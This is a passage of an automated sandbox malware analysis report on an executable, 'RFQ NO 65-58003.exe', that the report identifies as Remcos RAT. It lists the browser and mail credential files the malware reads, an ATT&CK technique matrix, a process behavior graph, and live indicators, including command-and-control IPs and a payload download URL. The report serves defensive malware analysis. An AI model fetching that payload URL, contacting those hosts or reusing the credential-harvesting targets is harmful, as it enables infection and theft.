              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_21202264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,14_2_21202264
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,19_2_004082CD
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeCode function: 0_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040344A

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000E.00000003.2928845396.00000000056FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.2898152047.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.2928001965.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.2899931678.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3391979783.000000000287F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.3221293540.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3394879441.00000000056B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.2896409361.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3395028821.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 4552, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Tries to steal Mail credentials (via file registry)
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: ESMTPPassword19_2_004033F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword19_2_00402DB3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword19_2_00402DB3
              Yara detected WebBrowserPassView password recovery tool
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 4552, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2196, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-HSAM04Jump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000E.00000003.2928845396.00000000056FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.2898152047.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.2928001965.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.2899931678.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3391979783.000000000287F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.3221293540.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3394879441.00000000056B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.2896409361.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3395028821.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 4552, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts11
              Native API              		Boot or Logon Initialization Scripts1
              Access Token Manipulation              		2
              Obfuscated Files or Information              		11
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		1
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              Command and Scripting Interpreter              		Logon Script (Windows)412
              Process Injection              		1
              Software Packing              		1
              Credentials in Registry              		2
              File and Directory Discovery              		SMB/Windows Admin Shares11
              Input Capture              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              PowerShell              		Login HookLogin Hook1
              DLL Side-Loading              		NTDS37
              System Information Discovery              		Distributed Component Object Model2
              Clipboard Data              		1
              Remote Access Software              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Masquerading              		LSA Secrets41
              Security Software Discovery              		SSHKeylogging2
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
              Virtualization/Sandbox Evasion              		Cached Domain Credentials31
              Virtualization/Sandbox Evasion              		VNCGUI Input Capture112
              Application Layer Protocol              		Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation              		DCSync4
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job412
              Process Injection              		Proc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577287 Sample: RFQ NO 65-58003.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 39 geoplugin.net 2->39 57 Suricata IDS alerts for network traffic 2->57 59 Found malware configuration 2->59 61 Antivirus detection for URL or domain 2->61 63 8 other signatures 2->63 9 RFQ NO 65-58003.exe 25 2->9         started        13 svchost.exe 1 1 2->13         started        signatures3 process4 dnsIp5 37 C:\Users\user\AppData\...\Rygklapperne.Tis225, Unicode 9->37 dropped 73 Suspicious powershell command line found 9->73 16 powershell.exe 28 9->16         started        47 127.0.0.1 unknown unknown 13->47 file6 signatures7 process8 signatures9 49 Early bird code injection technique detected 16->49 51 Writes to foreign memory regions 16->51 53 Found suspicious powershell code related to unpacking or dynamic code loading 16->53 55 2 other signatures 16->55 19 msiexec.exe 3 15 16->19         started        24 conhost.exe 16->24         started        process10 dnsIp11 41 212.162.149.91, 2404, 49874, 49880 UNREAL-SERVERSUS Netherlands 19->41 43 212.162.149.92, 49868, 80 UNREAL-SERVERSUS Netherlands 19->43 45 geoplugin.net 178.237.33.50, 49881, 80 ATOM86-ASATOM86NL Netherlands 19->45 35 C:\ProgramData\remcos\logs.dat, data 19->35 dropped 65 Detected Remcos RAT 19->65 67 Tries to steal Mail credentials (via file registry) 19->67 69 Maps a DLL or memory area into another process 19->69 71 Installs a global keyboard hook 19->71 26 msiexec.exe 14 19->26         started        29 msiexec.exe 1 19->29         started        31 msiexec.exe 1 19->31         started        33 2 other processes 19->33 file12 signatures13 process14 signatures15 75 Tries to harvest and steal browser information (history, passwords, etc) 26->75

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              RFQ NO 65-58003.exe14%VirustotalBrowse
              RFQ NO 65-58003.exe8%ReversingLabsWin32.Trojan.Generic

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://212.162.149.92/FbuhjxbSFSc116.binR0%Avira URL Cloudsafe
              http://212.162.149.92/FbuhjxbSFSc116.bin100%Avira URL Cloudmalware
              http://www.imvu.compData0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              geoplugin.net
              		178.237.33.50
              		truefalse
                		high
                fp2e7a.wpc.phicdn.net
                		192.229.221.95
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://geoplugin.net/json.gpfalse
                    		high
                    http://212.162.149.92/FbuhjxbSFSc116.binfalse
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.google.commsiexec.exe, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      		high
                      http://geoplugin.net/json.gphyqmsiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://g.live.com/odclientsettings/Prod1C:qmgr.db.13.drfalse
                          		high
                          http://www.imvu.comrmsiexec.exe, 0000000E.00000002.3407723975.00000000211D0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                            		high
                            http://geoplugin.net/json.gplmsiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://212.162.149.92/FbuhjxbSFSc116.binRmsiexec.exe, 0000000E.00000002.3394879441.000000000568A000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.imvu.compDatamsiexec.exe, 00000014.00000003.2903653103.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000014.00000003.2903681348.0000000002E9D000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
